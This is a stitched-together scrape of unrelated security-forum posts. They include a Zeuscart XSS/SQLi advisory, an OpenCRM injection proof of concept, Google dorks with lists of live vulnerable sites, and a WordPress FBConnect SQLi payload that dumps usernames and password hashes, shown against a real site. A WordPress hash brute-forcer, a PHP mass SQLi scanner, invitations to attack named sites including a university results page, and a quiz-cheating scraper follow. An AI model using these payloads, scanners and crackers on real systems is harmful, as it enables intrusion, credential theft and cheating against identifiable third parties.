Search the Community

Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: http://zeuscart.com/ Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://zeuscart.com/ [2] https://github.com/ZeusCart/zeuscart [3] https://github.com/ZeusCart/zeuscart/issues/28 [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html [5] https://github.com/sroesemann/zeuscart Source

SQL Vulnerability cu multe email-uri ! din cate stiu eu la ultima verificare am stat 2 ore si tot nu am reusit sa extrag toate email-urile ! http://www.maritime-database.com/company.php?cid=306976 http://www.psychicguild.com/dream_interpretation.php?id=16882

Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business Threat Level: High Severity: High CVSS Severity Score: 8.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (3) Error-Based SQL Injection Vulnerabilities (2) Time-Based Blind SQL Injection Vulnerabilities Vendor Overview OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers. Proof of Concept: https://demo.opencrm.co.uk:443/index.php?action=index&module=Calendar&action=setField&curr_row=&field=a ssigned_user_id&mode=list&module=Field&popuptype=&record=1&value='AND(Select%201%20from(selec t%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(112)%2cC HAR(73)%2cCHAR(108)%2cCHAR(88)%2cCHAR(72)%2cCHAR(51)%2cCHAR(52)%2cCHAR(114))%20f rom%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_sche ma.tables%20group%20by%20x)a)and'&viewid=0 Read more: http://dl.packetstormsecurity.net/1502-exploits/OpenCRM.pdf

Hello all you have to visit the website . We established a website error to the website over the world . common errors such as SQL injection, Cross-site Scripting (XSS), Local File inclusion, Remote File Inclusion, Bug. Sincerely thank you trace our website. © Vulnerability VN 2015 - All Rights Reserved Share 230 Website SQL injection Link Here: Vulnerability VN

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : Invem CMS SQL INJECTION Vulnerability [+] [+]Exploit Author : Ashiyane Digital Security Team [+] [+]Vendor Homepage: http://www.invem.com/ [+] [+]Google Dork : intext:Powered by INVEM. [+] [+]Date : 20 / Jan / 2015 [+] [+]Tested On : windows se7en + linux Kali + Google Chrome + Mozilla [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> DEMO <~ ~ ~ [+] [+] http://www.onemart.cc/news_view.php?newsid=124%27 [+] [+] http://www.jcptdc.com/about.php?id=1%27 [+] [+] http://www.plmgroup.cn/news_view.php?newsid=122%27 [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Discovered by : SeRaVo.BlackHat [+] Hassan [+] [+] [+] ~ General.BlackHat@Gmail.com ~ https://www.facebook.com/general.blackhat [+] [+] ~ Unitazad@YaHoo.com ~ https://twitter.com/strip_ssl [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + 3cure BlackHat + Dr.3vil [+] Mr.Time + SHD.N3T + MR.M@j!D + eb051 + RAMIN + ACC3SS + X3UR + 4li.BlackHat + IraQeN-H4XORZ [+] Dj.TiniVini + NoL1m1t + l4tr0d3ctism + r3d_s0urc3 + 0x0ptim0us + E1.Coders + MR.F@RDIN [+] 0xTiger + C4T + Predator + S!Y0U.T4r.6T + soheil.hidd3n + Soldier + Spoofer + Cyb3r_Dr4in [+] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + G3N3Rall + Mr.XHat [+] [+] And All Iranian Cyber Army ...\. [+] Home : Ashiyane.org/Forum [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] Source : Sites Powered By INVEM SQL Injection ? Packet Storm

w3af, is a Web Application Attack and Audit Framework. The w3af core and it’s plugins are fully written in python, it identifies more than 200 vulnerabilities and reduce your site’s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations. Download: https://github.com/andresriancho/w3af

Database changes monitor SQLWatch 4.0 - tool for monitoring and profiling SQL queries in application on JDBC Driver layer. Currenly supported JDBC Drivers: MySQL - direct supported Other (including MySQL) - supported through log4jdbc driver proxy Profiling: How many times same data is selected from database per operation? How long it take to perform all SQL queries per operation? Is SQL queries efficient? SQLWatch-QueriesProfiler: listens all SQL queries from JDBC driver and aggregates them. Whan no queries is received within 5 sec (configurable) then queries statistics is printed to stdout. Download: http://sqlwatch.googlecode.com/files/sqlwatch-4.0-preview-v1.zip http://sqlwatch.googlecode.com/files/sqlwatch3.0.0.jar

Am facut un mic script care scaneaza adresele url puse de voi intr-un fisier text. Nu e prea sofisticat, dar o sa ii mai aduc imbunatatiri. <?php echo'<title>URL List SQLi scanner</title>'; echo "<u><tr>Utilizare:</tr></br></u> Creeaza un fisier adrese.txt in care sa existe pe fiecare linie cate o adresa url</br> in formatul http://url.tld . Url-urile vulnerabile vor fi afisate si vor fi salvate si in fisierul bune.txt</br></br>"; $fisier = file_get_contents('adrese.txt'); // Citeste lista cu url-uri $linii = explode("\n", $fisier); // Preia fiecare url $fisier = fopen("bune.txt", "a"); // Aici le va pune pe cele vulnerabile echo"<u>Url-uri vulnerabile:</u></br></br>"; for($i = 0; $i < count($linii) - 1; $i++) scann($linii[$i]); // Testeaza fiecare url function scann($sqli) { global $fisier; $sintaxa="'"; $fraza=file_get_contents("$sqli$sintaxa"); $cuvant="error in your SQL syntax"; $pos = strpos($fraza,$cuvant); if($pos === false) { $ok=0; } else { $ok=1; } if($ok==1) { fwrite($fisier, $sqli . "\n"); // Scrie in bune.txt url-urile vulnerabile echo"$sqli <br>"; // Afiseaza url-urile vulnerabile } } fclose($fisier); // Inchide fisierul echo '<center></br></br>URL List SQLi Scanner v1.0 - Silvian0 @ <a href="http://rstcenter.com">RSTCenter.com</a></center>'; ?>

A mixed bag: new and old/ attack and defense/ for developers, managers, testers/ PHP, AJAX, Rails, Java, .NET, Oracle etc. Ajax Security [2007] Apache Security [2005] Applied Oracle Security: Developing Secure Database and Middleware Environments [2009] BackTrack 4: Assuring Security by Penetration Testing [2011] Beginning ASP.NET Security [2010] Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management [2005] Cracking Drupal: A Drop in the Bucket [2009] Developer's Guide to Web Application Security [2007] E-Commerce: A Control and Security Guide [2004] Enterprise Web Services Security [2005] Essential PHP Security [2005] Expert Web Services Security in the .NET Platform [2004] request download ticket | ifile.it --- Google Hacking for Penetration Testers [2005] Google Hacking for Penetration Testers, Volume 2 [2007] Hacker Web Exploitation Uncovered [2005] Hacking Exposed Web 2.0 [2007] Hacking Exposed Web Applications, 3rd Edition [2011] HackNotes Web Security Pocket Reference [2003] Hack Proofing ColdFusion [2002] Hack Proofing Your E-Commerce Site [2001] Hack Proofing Your Web Applications [2001] How to Break Web Software: Functional and Security Testing of Web Applications and Web Services [2006] Implementing Database Security and Auditing: Includes Examples for Oracle, SQL Server, DB2 UDB, Sybase [2005] Joomla! Web Security [2008] Mastering Web Services Security [2003] ModSecurity 2.5 [2009] ModSecurity Handbook [2010] Oracle Security [1998] php architect's Guide to PHP Security [2005] Practical Oracle Security: Your Unauthorized Guide to Relational Database Security [2007] request download ticket | ifile.it --- Preventing Web Attacks with Apache [2006] Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses, Second Edition [2010] Secure E-Government Web Services [2005] Securing PHP Web Applications [2009] Security for Web Services and Service-Oriented Architectures [2009] Security Fundamentals for E-Commerce [2002] Security on Rails [2009] Security Technologies for the World Wide Web, Second Edition [2002] Seven Deadliest Web Application Attacks [2010] SQL Injection Attacks and Defense [2009] SQL Server Security Distilled [2004] SSL & TLS Essentials: Securing the Web [2000] The Oracle Hacker's Handbook: Hacking and Defending Oracle [2007] The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws [2007] The Database Hacker's Handbook: Defending Database Servers [2005] Web 2.0 Security - Defending AJAX, RIA, AND SOA [2007] Web Application Vulnerabilities: Detect, Exploit, Prevent [2007] Web Hacking: Attacks and Defense [2002] Web Security, Privacy and Commerce, 2nd Edition [2002] Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast [2008] Web Services Security [2003] XML Security [2002] XSS Exploits and Defense [2007] request download ticket | ifile.it

Login X Va rog si metoda/sintaxa. Explicati putin cumn functioneaza. PS: Stiu ca va bat la cap cu chestii deastea...

Pentru cei ce dau quizuri SQL la scoala pentru acea diploma oracle-shit. linux/windows/mac ©miN 2012 V-ati saturat sa tot selectati tabul cu google, sa dati copy paste la intrebare, apoi sa alegeti un site relevant, apoi sa gasiti intrebarea, apoi sa-i cautati raspunsul, sa-l alegeti dupa sau dupa cum vine pus in pagina si apoi sa va intoarceti la tabul cu quizul deschis si apoi sa bifati si acolo raspunsul corect ? Cu acest soft e nevoie doar de un simplu Ctrl-C Ctrl-V si dupa ce dati enter in mai putin de o secunda primiti raspunsul corect. Scriptul poate fi foarte usor adaptat si la altfel de perechi intrebare-raspuns(uri), singurul lucru ce trebuie modificat (adaugat) este functia de parsare a paginii cu intrebarea identica gasita acolo, astfel incat sa poata extrage raspunsul de sub intrebare cu un anumit model codat de voi desigur. Chiar daca nu va intereseaza niciuna din cele de mai sus, softul este robust, bine pus la punct, cod clar si comentat, logica in ordinea actiunilor si este un foarte bun exemplu pentru amatorii de programare concurenta si legatura minima de 0-dependenta intre interfata-motor desi exista sincronizari primitive live. [Python] oaf - Pastebin.com #! /usr/bin/env python # Oracle Answer Finder # 02.05.2012 cmiN from Tkinter import * from urllib2 import build_opener, HTTPError, URLError from urlparse import urlparse from threading import Thread, Event from socket import setdefaulttimeout, timeout # constants SMAX = 8 # maximum number of results DIFF = 512 # how many chars to skip until the answer TOUT = 2 # timeout in seconds class GUI(Frame): def __init__(self, master=None, margin=10): Frame.__init__(self, master) self.app = Engine() # main app self.thread = None # Thread object used for parallel processing self.master.title("OAF - cmiN") self.grid(padx=margin, pady=margin) self.widgets() self.mainloop() def callback(self, event): """What happens after you press Enter in Question's entry.""" # get and edit question qon = self.app.edit_qon(self.qEntry.get()) if self.thread: # if it was initialized before # check question if qon == self.app.qon[0]: # same question (no reset) if self.thread.is_alive(): # let it finish return else: self.app.data = "" # empty buffer self.app.dataLen = 0 else: # another if self.thread.is_alive(): self.app.stop() self.thread.join() self.app.reset() # reset everything # set question self.app.set_qon(qon) # process data self.thread = Thread(target=self.app.process) self.thread.start() # no return def widgets(self): # variables self.statusVar = StringVar(value="Ready.") # passed to Thread class for live updating #self.ansVar = StringVar() # same thing, but for answer self.app.statusVar = self.statusVar #self.app.ansVar = self.ansVar # label-entry pairs self.qLabel = Label(self, text="Question:") self.qEntry = Entry(self, width=100) self.aLabel = Label(self, text="Answer:") #self.aEntry = Entry(self, width=100, textvariable=self.ansVar) self.qLabel.grid(row=0, column=0, sticky="w") self.qEntry.grid(row=1, column=0) self.aLabel.grid(row=2, column=0, sticky="w") #self.aEntry.grid(row=3, column=0) # status widget self.sLabel1 = Label(self, text="Status:") self.sLabel2 = Label(self, width=86, textvariable=self.statusVar, relief="sunken", bd=2, anchor="c") self.sLabel1.grid(row=4, column=0, sticky="w") self.sLabel2.grid(row=5, column=0, sticky="w") # text instead entry for answer self.ansText = Text(self, width=75, height=10) self.ansText.grid(row=3, column=0) self.app.ansText = self.ansText # make it available to the engine # behavior self.qEntry.bind("<Return>", self.callback) self.qEntry.bind("<KP_Enter>", self.callback) class Engine: def __init__(self): setdefaulttimeout(TOUT) self.opener = build_opener() self.opener.addheaders = [("User-agent", "Mozilla/5.0")] self.qon = ["", ""] # question self.data = "" # data contain the question [and answer] self.dataLen = 0 # data length self.start = 0 # google first result self.first = "url?q=" # from self.second = "&amp" # to self.seen = set() # evidence of visited links self.statusVar = None # through this set status self.ansVar = None # through this set answer if available self.ansText = None # almost same shit self.__stop = Event() # stop the process self.upEvent = Event() # solve the deadlock self.upEvent.set() # means it's safe (.wait will wait until .set is called or .is_set() is True) def update(self, status, answer): """Here is a fucking deadlock, when the same function is called simultaneously.""" self.upEvent.wait() # wait to be setted self.upEvent.clear() # make it busy # do your ugly things if hasattr(self.statusVar, "set") and hasattr(self.statusVar, "get"): self.statusVar.set(status) self.statusVar.get() # just to make sure the update finished if hasattr(self.ansVar, "set") and hasattr(self.ansVar, "get"): self.ansVar.set(answer) self.ansVar.get() if hasattr(self.ansText, "insert") and hasattr(self.ansText, "delete"): self.ansText.delete(0.0, END) self.ansText.insert(0.0, answer) self.upEvent.set() # make it available def stop(self): self.update("Stopping...", "") self.__stop.set() def stopped(self): return self.__stop.is_set() def reset(self): self.__stop.clear() self.start = 0 self.seen = set() #self.update("Ready.", "") def edit_qon(self, qon): return qon.strip().split("\n")[0] # idiot proof def set_qon(self, qon): """Set question.""" self.qon[0] = qon self.qon[1] = '"' + self.qon[0].replace(" ", "+") + '"' def find(self): """Find links corresponding to query using google. Returns: 0 -> match, link extracted, data updated 1 -> no match for exact string 2 -> url already visited or invalid url 3 -> banned 4 -> maximum number of results exceeded """ if self.start >= SMAX: return 4 link = "http://www.google.com/search?q={}&start={}".format(self.qon[1], self.start) try: fobj = self.opener.open(link) except HTTPError: self.update("Google banned you.", "") return 3 except timeout: self.update("Timed out or Google banned you.", "") return 3 else: data = fobj.read() # google's source fobj.close() # find a relevant closest position to the link index1 = data.find(self.first) if index1 == -1: # no results in page or modified pattern return 1 # invalid source self.start += 1 # now do the increment index1 += len(self.first) index2 = data.find(self.second, index1) url = data[index1:index2] # edit url newurl = "" i = 0 length = len(url) while i < length: if url[i] == "%": char = chr(int(url[i + 1] + url[i + 2], 16)) i += 2 else: char = url[i] newurl += char i += 1 url = newurl # process it if url in self.seen: # link already visited return 2 self.seen.add(url) upo = urlparse(url) self.update("Looking in %s..." % upo.netloc, "") try: fobj = self.opener.open(url) except URLError: self.update("Invalid link.", "") return 2 except timeout: self.update("Timed out.", "") return 3 else: self.data = fobj.read() self.dataLen = len(self.data) fobj.close() return 0 # all fine def check(self, old, index): if index < 0 or index >= self.dataLen: return False # invalid index if abs(old - index) > DIFF: return False # too far return True # ok def get_star(self, index): """Find the line with . Returns: str -> good answer False -> invalid answer or couldn't find """ ansNr = 1 # default answers (for multiple ones) chunk = "(Choose " firstTag = self.data.find("<", index) chunkIndex = self.data.find(chunk, index, firstTag) if chunkIndex != -1: chunkIndex += len(chunk) number = "" while self.data[chunkIndex] != ")": number += self.data[chunkIndex] chunkIndex += 1 number = number.strip().lower() if number == "two": ansNr = 2 elif number == "three": ansNr = 3 elif number == "four": ansNr = 4 # i don't think this actually exists star = "(*)" last = index ans = "" while ansNr: index = self.data.find(star, last) - 1 last = index + 1 + len(star) if index < 0: return False # invalid answer type # ok now we're good old = index while True: tag = True while self.data[index] != ">": if tag and self.data[index].isspace(): index -= 1 continue if tag: ans = "\n" + ans tag = False # found alphanumeric ans = self.data[index] + ans index -= 1 if not self.check(old, index): return False ans = ans.strip() if tag and len(ans) > 0: break while self.data[index] != "<": index -= 1 index -= 1 ansNr -= 1 ans = "\n" + ans return ans.strip() def get_single(self, index): """Line with single answer. Returns: str -> good answer False -> invalid answer or couldn't find """ new = True # first answer (if multiple) ans = "" smooth = 1 # tag number difference while True: old = index # go to the first tag while self.data[index] != "<": index += 1 if not self.check(old, index): return False # no skip all of them nrTag = 0 while self.data[index] == "<": while self.data[index] != ">": index += 1 index += 1 nrTag += 1 # add tag if not self.check(old, index): return False if new: new = False # not new anymore model = nrTag if abs(nrTag - model) > smooth: break # no incoming answers to this question while self.data[index] != "<": ans += self.data[index] index += 1 if not self.check(old, index): return False # add separator (don't worry, we will strip it at the end) ans = ans.strip() + "\n\n" ans = ans.strip() if ans == "": return False # empty one return ans def process(self): """Try to find answers to quiz questions by searching them on google. Format string, search it on google, locate first %d results, then search among them for patterns (question<>...<>answer<> or question<>answer...<>). Returns: str -> answer found (or false positive) 1 -> invalid/inexistent question (or google invalid source pattern) 2 -> answer not found (or different search pattern) 3 -> stopped 4 -> banned """ % SMAX ret = 0 # virtual return while True: if self.stopped(): return 3 # stopped if ret == 1: self.update("Invalid question.", "") return 1 # invalid question elif ret == 2: # already seen or invalid ret = self.find() continue elif ret == 3: return 4 # timed out or banned (too many queries) elif ret == 4: self.update("Nothing found.", "") return 2 # not found index = self.data.find(self.qon[0]) if index >= 0: #index += len(self.qon[0]) # conflict with star (need some data from question) ans = self.get_star(index) if not ans: ans = self.get_single(index) if ans: self.update("Answer found!", ans) return ans # string ok ret = self.find() if __name__ == "__main__": GUI(Tk()) Dupa ce consider ca nu da gres deloc si nu face vreo faza prea ciudata (in limita bunului simt al utilizatorului) inghet versiune cu executabil pentru windows, deocamdata raportati-mi buguri, critici si pareri, totusi daca nu aveti rabdare sa va puneti Python si pe alte masini puteti sa va rezolvati foarte repede cu cx_Freeze. Nou! Daca nu va place raspunsul primit mai puteti apasa o data enter la aceeasi intrebare si el va cauta prin urmatoarele rezultate dupa un nou raspuns. In timp ce cauta daca schimbati intrebarea si dati iar enter atunci ii da un semnal sa inceteze cautarea curenta si apoi trece la cea noua (experimental, mai ingheata uneori (deadlocks)). V-am promis si versiunea portabila pentru windows: box gf

Wordpress Sql Injection App : FBConnect WordPress Plugin Type : Sql-Injection Dork : inurl:"fbconnect_action=myhome" Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users-- Exemple: http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users-- ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python): # code by : tdxev # website : www.tdxev.com # team : www.insecurity.ro # version : 2011.01.17 # documentation : /wp-includes/class-phpass.php import md5 import time # user settings wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made # app settings itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' # use by crypt_private def encode64 (textInput,count): output = '' i = 0 while i < count : i = i + 1 value = ord(textInput[i-1]) output = output + itoa64[value & 63] if i < count : value = value | ord(textInput[i]) << 8 output = output + itoa64[(value >> 6) & 63] i = i + 1 if i >= count: break if i < count: value = value | ord(textInput[i]) <<16 output = output + itoa64[(value >> 12) & 63] i = i + 1 if i >= count: break output = output + itoa64[(value >> 18) & 63] return output # generate wordpress hash def crypt_private (plainText, wordpressHash): output = '*0' # old type | not suported yet if wordpressHash[0:2] == output: output = '*1' if wordpressHash[0:3] != '$P$': # old type | not suported yet return output count_log2 = itoa64.find(wordpressHash[3]) # get who many times will generate the hash if (count_log2 < 7) or (count_log2>30): return output count = 1 << count_log2 # get who many times will generate the hash salt = wordpressHash[4:12] # get salt from the wordpress hash if len(salt) != 8 : return output plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try for i in range (count): plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt) output = output + encode64(plainTextHash,16) # create the new hash return output # class that generate the words class wordGenerator (): def __init__(self, word, charSet): self.setCurretWord(word) # word to start self.setCharSet(charSet) # characther set used to generate the words # set current word def setCurretWord (self, word): self.currentWord = word # set the character set that will be used def setCharSet (self, charSet): self.charSet = charSet # generate the next word set that word as currentWord and retutn the word def nextWord (self): self.setCurretWord( self._incWord(self.currentWord) ) return self.currentWord # generate the next word def _incWord(self, word): word = str(word) # convert to string if word == '': # if word is empty return self.charSet[0] # return first char from the char set wordLastChar = word[len(word)-1] # get the last char wordLeftSide = word[0:len(word)-1] # get word without the last char lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set else: # it is the last char wordLastChar = self.charSet[0] # reset last chat to have first character from the char set wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased return wordLeftSide + wordLastChar # return the next word # check if is right type of hashs for wpHash in wpHashList: if wpHash[0:3] != '$P$': print "Wrong password type or password type is DES not impemented yet!" exit() # create a new wordGenerator newWord = wordGenerator ('',charSet); # word generator wordsFound = 0 exitLoop = False def found(hashItem, word): global wordsFound global exitLoop d = open(dumpFile,'a') # open file for append d.write(hashItem + ' = ' + word +"\n") # write the result d.close() # close file wordsFound = wordsFound + 1 # increase the number of hashs cracked print hashItem + ' = ' + word # display the word if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list exitLoop = True # rise flag to stop the loop and exit def setProgress(word) : d = open(progFile,'w') # open file for append d.write("Position :"+ word +"\n") # write the current word d.close() # close file count = 0 while exitLoop == False: word = newWord.nextWord() count = count + 1 #print word for wpHash in wpHashList: newHash = crypt_private(word,wpHash) if wpHash == newHash : found(newHash,word) if count == 1000 : count = 0 setProgress(word) H4ve fun :D:D

There are many vulnerable links but One vulnerable link is given: Whoever completes PM me..... http://gtu.ac.in:80/result/may_jun_j...jul10_show.asp http://gtu.ac.in/Result/May_Jun_Jul10/Result_MB2_May10.asp